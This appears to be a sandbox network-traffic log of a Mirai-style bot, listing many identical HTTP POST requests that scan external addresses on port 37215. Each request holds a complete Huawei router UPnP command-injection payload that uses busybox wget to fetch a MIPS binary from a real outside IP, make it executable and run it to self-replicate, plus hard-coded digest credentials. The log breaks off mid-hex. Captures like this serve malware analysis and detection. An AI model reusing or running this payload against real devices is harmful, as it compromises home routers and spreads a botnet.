                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2001192.168.2.1358464157.45.128.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686861992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2002192.168.2.134628041.219.13.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686877966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2003192.168.2.133995641.143.192.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686899900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2004192.168.2.133293041.205.77.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687005997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2005192.168.2.134915241.217.222.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687071085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2006192.168.2.1346658157.235.13.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687103033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2007192.168.2.1348796197.214.130.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687129021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2008192.168.2.134119041.117.160.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687155962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2009192.168.2.133389895.182.129.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687190056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2010192.168.2.1347072157.119.171.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687210083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 